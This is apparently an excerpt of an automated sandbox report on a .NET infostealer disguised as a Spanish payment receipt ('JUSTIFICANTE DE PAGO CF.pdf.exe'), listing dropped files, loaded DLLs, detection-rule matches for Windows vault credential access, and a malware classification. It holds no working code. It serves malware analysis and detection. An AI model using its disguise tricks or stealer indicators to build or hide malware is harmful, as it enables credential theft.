                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecc3eab7-e292-410a-b454-1bd1e0e2e768.exe4 vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNnemtwpsj.dll" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1991439502.00000000011DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.0000000003291000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecc3eab7-e292-410a-b454-1bd1e0e2e768.exe4 vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000000.1960195835.0000000000C52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEjhrxhh.exe" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecc3eab7-e292-410a-b454-1bd1e0e2e768.exe4 vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206382478.0000000000EF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeBinary or memory string: OriginalFilenameEjhrxhh.exe" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vaultcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vaultcli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vaultcli.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vaultcli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dpapi.dll
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: 6.2.Reramvw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.31afa1c.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, YsTq4S.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, G2Tmmpnyphl.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, G2Tmmpnyphl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/7@3/3
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile created: C:\Users\user\AppData\Roaming\Reramvw.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMutant created: NULL
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
